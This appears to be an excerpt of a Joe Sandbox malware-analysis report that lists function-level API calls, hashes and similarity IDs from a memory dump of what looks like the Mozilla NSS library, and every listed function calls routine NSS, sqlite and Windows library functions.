Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: c26acae4cc8d984b26905e718347814a1d67796e9700d4f377c076443ef73c1e
Instruction ID: a117c1f0be540b818d37438eb57d18e9360bcd9d6cb77a369ca7f07954581398
Opcode Fuzzy Hash: c26acae4cc8d984b26905e718347814a1d67796e9700d4f377c076443ef73c1e
Instruction Fuzzy Hash: EE51A9F6E002015FEB009FA4DD41AAB37B89F0531CF250464EC199B712FB31ED1986A3

Function 6CE76E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CE76ED8
sqlite3_value_text.NSS3(?,?), ref: 6CE76EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CE76FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CE76FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CE76FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CE77010
sqlite3_value_blob.NSS3(?,?), ref: 6CE7701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CE77052

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: de92cd9d5ae86b403d25591f0f75cb8b6d8d7f6df5b4f6e8868d24475c4c1e92
Instruction ID: e313394a677d0a506267d42c16fe62a900f36533e523d9a8813227618dd50013
Opcode Fuzzy Hash: de92cd9d5ae86b403d25591f0f75cb8b6d8d7f6df5b4f6e8868d24475c4c1e92
Instruction Fuzzy Hash: 9261B0B1E0420A8BDB25CF64D8017EEB7B6AF4530CF384169D815AB751E7329D16CBB0

Function 6CEE8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CEE7313), ref: 6CEE8FBB

Part of subcall function 6CEE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE88298,?,?,?,6CE7FCE5,?), ref: 6CEE07BF
Part of subcall function 6CEE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEE07E6
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE081B
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CEE7313), ref: 6CEE9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CEE7313), ref: 6CEE903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CEE7313), ref: 6CEE909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CEE7313), ref: 6CEE90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CEE7313), ref: 6CEE90F1

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CEE7313), ref: 6CEE906B

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CEE7313), ref: 6CEE9128

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 4b988e96c794600b98bed30defabb55fe93f53504332db22f845541b8ca1be7b
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 46518371A002018FEB10DF6ADC44BA6B3F5AF4939CF364169D915D7B61EB31E805CB91

Function 6CE99C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6CE98850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CEA0715), ref: 6CE98859
Part of subcall function 6CE98850: PR_NewLock.NSS3 ref: 6CE98874
Part of subcall function 6CE98850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CE9888D

PR_NewLock.NSS3 ref: 6CE99CAD

Part of subcall function 6CF498D0: calloc.MOZGLUE(00000001,00000084,6CE70936,00000001,?,6CE7102C), ref: 6CF498E5

Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707AD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707CD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707D6
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CE0204A), ref: 6CE707E4
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,6CE0204A), ref: 6CE70864
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE70880
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,6CE0204A), ref: 6CE708CB
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708D7
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708FB

TlsGetValue.KERNEL32 ref: 6CE99CE8
EnterCriticalSection.KERNEL32(?,?,6CE9ECEC,6CEA2FCD,00000000,?,6CEA2FCD,?), ref: 6CE99D01
TlsGetValue.KERNEL32(?,?,?,6CE9ECEC,6CEA2FCD,00000000,?,6CEA2FCD,?), ref: 6CE99D38
EnterCriticalSection.KERNEL32(?,?,6CE9ECEC,6CEA2FCD,00000000,?,6CEA2FCD,?), ref: 6CE99D4D
PR_Unlock.NSS3 ref: 6CE99D70
PR_Unlock.NSS3 ref: 6CE99DC3
PR_NewLock.NSS3 ref: 6CE99DDD

Part of subcall function 6CE988D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CEA0725,00000000,00000058), ref: 6CE98906
Part of subcall function 6CE988D0: EnterCriticalSection.KERNEL32(?), ref: 6CE9891A
Part of subcall function 6CE988D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CE9894A
Part of subcall function 6CE988D0: calloc.MOZGLUE(00000001,6CEA072D,00000000,00000000,00000000,?,6CEA0725,00000000,00000058), ref: 6CE98959
Part of subcall function 6CE988D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CE98993
Part of subcall function 6CE988D0: PR_Unlock.NSS3(?), ref: 6CE989AF

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 1207fa21abfe7aaff7d00605f387e06c158f16a6cd4a47a320b2c383e589a24f
Instruction ID: c14c7c824be28adc65d247b3ba059951fa832b4e5514215cec9b4f36cd801934
Opcode Fuzzy Hash: 1207fa21abfe7aaff7d00605f387e06c158f16a6cd4a47a320b2c383e589a24f
Instruction Fuzzy Hash: 535140B0A057059FDB10EF68C08465EBBF4BF45359F258529D89CDB721EB34E884CB91

Function 6CF99EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CF99EC0
EnterCriticalSection.KERNEL32(?), ref: 6CF99EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6CF99F73
EnterCriticalSection.KERNEL32(?), ref: 6CF99FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CF99FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6CF99FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6CF9A01D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: d509ba6d4d641dc7ecdd457a0b4f07d27fa20fa4a65536bc49f224e5e6341758
Instruction ID: 60bfe947a75c0b95e987238a6bbba5ba90d8eda272eb7b4b1bd4dbf2ac8cb9a5
Opcode Fuzzy Hash: d509ba6d4d641dc7ecdd457a0b4f07d27fa20fa4a65536bc49f224e5e6341758
Instruction Fuzzy Hash: 6051A2B2900600DFDB109F25D48478ABBF4FF04319F15866AD85957B16EB31F985CBD1

Function 6CE8DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CE8DCFA

Part of subcall function 6CF49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF90A27), ref: 6CF49DC6
Part of subcall function 6CF49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF90A27), ref: 6CF49DD1
Part of subcall function 6CF49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF49DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CE8DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CE8DD62
CERT_DestroyCertificate.NSS3(?), ref: 6CE8DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6CE8DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6CE8DD8F

Part of subcall function 6CEA06A0: TlsGetValue.KERNEL32 ref: 6CEA06C2
Part of subcall function 6CEA06A0: EnterCriticalSection.KERNEL32(?), ref: 6CEA06D6
Part of subcall function 6CEA06A0: PR_Unlock.NSS3 ref: 6CEA06EB

CERT_DestroyCertificate.NSS3(?), ref: 6CE8DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6CE8DDB7

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 04fa768fa556acf2fb1568d310a5634f51702579b5b1072882a29ee3ce833246
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: A5218EBAE021169BDF019F94DC409DEB7B4AF05218B250125EC1CA7B51F731EA15CBE2

Function 6CF15F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CF1AADB,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15F72

Part of subcall function 6CE7ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CE7ED8F
Part of subcall function 6CE7ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CE7ED9E
Part of subcall function 6CE7ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CE7EDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CF1AADB,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6CF1AADB,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15FCC
free.MOZGLUE(?,?,6CF1AADB,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6CF1AADB,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15FF4
free.MOZGLUE(?,?,6CF1AADB,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF15FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CF1AADB,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF16019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CF1AADB,?,?,?,?,?,?,?,?,00000000,?,6CF180C1), ref: 6CF16036

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: 2e6ee290fbe4d0453edb64867c7cc060572cf9a1f5563ab0b5c607f8316d232e
Instruction ID: 394bbaf23b7040d815904ed0ad685b41e7cd85e38af164b94223ef5e93f078e3
Opcode Fuzzy Hash: 2e6ee290fbe4d0453edb64867c7cc060572cf9a1f5563ab0b5c607f8316d232e
Instruction Fuzzy Hash: B421D8F5A04B009BEA219F759C48BD777B8AF4574CF14092CE56AC7A40EB36F019CBA1

Function 6CE83C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6CEF460B,?,?), ref: 6CE83CA9
EnterCriticalSection.KERNEL32(?), ref: 6CE83CB9
PL_HashTableLookup.NSS3(?), ref: 6CE83CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6CE83CD6
PR_Unlock.NSS3 ref: 6CE83CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CE83CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE83D03
PR_Unlock.NSS3 ref: 6CE83D15

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: a163925f35a42da48a71d5ee04c9c5cdaaff504e6de7fd3951bbc4b39010efa6
Instruction ID: 4af13876336f840651c762b775babf7e8ae693c5aa2468da6e71256162e4da1f
Opcode Fuzzy Hash: a163925f35a42da48a71d5ee04c9c5cdaaff504e6de7fd3951bbc4b39010efa6
Instruction Fuzzy Hash: EE115C76E0150577EB415B34AC04AAA7B38EF0225CB390130ED1C83752FB22D958C3D1

Function 6CE89C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CEA11C0: PR_NewLock.NSS3 ref: 6CEA1216

free.MOZGLUE(?), ref: 6CE89E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE89E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE89E4E
TlsGetValue.KERNEL32 ref: 6CE89EA2

Part of subcall function 6CE99500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CE99546

EnterCriticalSection.KERNEL32(?), ref: 6CE89EB6
PR_Unlock.NSS3 ref: 6CE89ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CE89F18

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 1c8221a9018216034228cf625ffc9d11cd78fc45de4fda51b9313057feb1babd
Instruction ID: 288a746a393ccb15036b7cc7a0ba0cc852808f6ddc213b33f0be2293b0e480f6
Opcode Fuzzy Hash: 1c8221a9018216034228cf625ffc9d11cd78fc45de4fda51b9313057feb1babd
Instruction Fuzzy Hash: 4A81D0B1E01601ABEB009F34DC41AABBBF9BF4524CF24452CE85987B51FB31E958C7A1

Function 6CE9DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE9AB10: DeleteCriticalSection.KERNEL32(D958E852,6CEA1397,5B5F5EC0,?,?,6CE9B1EE,2404110F,?,?), ref: 6CE9AB3C
Part of subcall function 6CE9AB10: free.MOZGLUE(D958E836,?,6CE9B1EE,2404110F,?,?), ref: 6CE9AB49
Part of subcall function 6CE9AB10: DeleteCriticalSection.KERNEL32(5D5E6D09), ref: 6CE9AB5C
Part of subcall function 6CE9AB10: free.MOZGLUE(5D5E6CFD), ref: 6CE9AB63
Part of subcall function 6CE9AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CE9AB6F
Part of subcall function 6CE9AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CE9AB76

TlsGetValue.KERNEL32 ref: 6CE9DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6CE9DD0E
PK11_IsFriendly.NSS3(?), ref: 6CE9DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CE9DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE9DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE9DEA6
PR_Unlock.NSS3(?), ref: 6CE9DF08

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: 07680a854307c23fa182aa144f0f5a5ec0df4e6548536056d03e57b482378f60
Instruction ID: 3ee027aabf106641706877a4b35fb017f0b067a73cebff3786202ca56113ab25
Opcode Fuzzy Hash: 07680a854307c23fa182aa144f0f5a5ec0df4e6548536056d03e57b482378f60
Instruction Fuzzy Hash: CF91D4B9E002159FDB00CF68C881BAAB7B5BF5530CF348129DD199B751E731EA46CBA1

Function 6CE55FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6CF3BB62,00000004,6CFA4CA4,?,?,00000000,?,?,6CE131DB), ref: 6CE560AB
sqlite3_config.NSS3(00000004,6CFA4CA4,6CF3BB62,00000004,6CFA4CA4,?,?,00000000,?,?,6CE131DB), ref: 6CE560EB
sqlite3_config.NSS3(00000012,6CFA4CC4,?,?,6CF3BB62,00000004,6CFA4CA4,?,?,00000000,?,?,6CE131DB), ref: 6CE56122

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE56095
misuse, xrefs: 6CE5609F
%s at line %d of [%.10s], xrefs: 6CE560A4

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: eabccffbca6ac1f6e17c7a6eee2eeea539ac050552927327d280dfa08a79ae54
Instruction ID: e927c95a0267fa9c3d069744197ac478726cab5f22725668578e0f47abd3c20f
Opcode Fuzzy Hash: eabccffbca6ac1f6e17c7a6eee2eeea539ac050552927327d280dfa08a79ae54
Instruction Fuzzy Hash: 99B14D74E1464ACFCB44CF6CC284AA9FBF0FB1E304B158159D509AB362E731BA85CB95

Function 6CE04F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE04FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE051BB

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE051A5
misuse, xrefs: 6CE051AF
unable to delete/modify user-function due to active statements, xrefs: 6CE051DF
%s at line %d of [%.10s], xrefs: 6CE051B4

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
